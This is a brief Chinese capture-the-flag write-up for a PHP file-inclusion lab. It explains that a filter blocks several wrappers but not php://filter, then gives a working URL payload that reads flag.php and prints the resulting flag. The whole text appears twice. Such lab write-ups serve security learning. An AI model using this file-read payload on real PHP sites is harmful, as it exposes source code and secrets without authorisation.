打开容器后发现,就是一段php代码,先分析代码的含义,根据提示,正则绕过,伪协议读取,发现里边的base64,convert,data等都被禁用,但是filter和resource没被禁用。
直接进行尝试。
http://qtl3q1a29.lab.aqlab.cn/?file=php://filter/resource=flag.php
直接拿到flag的值。
flag{WEBONEONEFOUREWELOME}
打开容器后发现,就是一段php代码,先分析代码的含义,根据提示,正则绕过,伪协议读取,发现里边的base64,convert,data等都被禁用,但是filter和resource没被禁用。
直接进行尝试。
http://qtl3q1a29.lab.aqlab.cn/?file=php://filter/resource=flag.php
直接拿到flag的值。
flag{WEBONEONEFOUREWELOME}